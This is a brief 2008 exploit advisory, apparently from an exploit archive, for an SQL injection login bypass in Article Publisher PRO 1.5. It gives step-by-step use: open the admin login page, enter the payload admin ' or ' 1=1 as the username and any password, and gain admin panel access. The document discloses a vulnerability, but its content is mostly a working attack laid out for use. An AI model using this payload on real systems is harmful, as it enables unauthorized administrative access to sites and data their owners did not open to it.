id: 3994
date: 10/31/2008
title: Article Publisher PRO 1.5 (SQL Injection) Auth Bypass Vulnerability
author: Hakxer
cves: 

===================================================================
Article Publisher PRO 1.5 (SQL Injection) Auth Bypass Vulnerability
===================================================================


# Discovered by : Hakxer
# Type Gap : Bybass Login
# Script : Article Publisher Pro : http://www.phparticlescript.com/
##########################################################################

[~] Go to http://demo-article-publisher-pro.phparticlescript.com/admin/admin.php
[~] Exploit 
[~] In Username Write : admin ' or ' 1=1
[~] In Password Write any thing Example : Hakxer
[~] Click Login ..! Now You Are In admin panel

# Proud To be a Muslim #
#_=END=_#



#  0day.today [2023-03-23]  #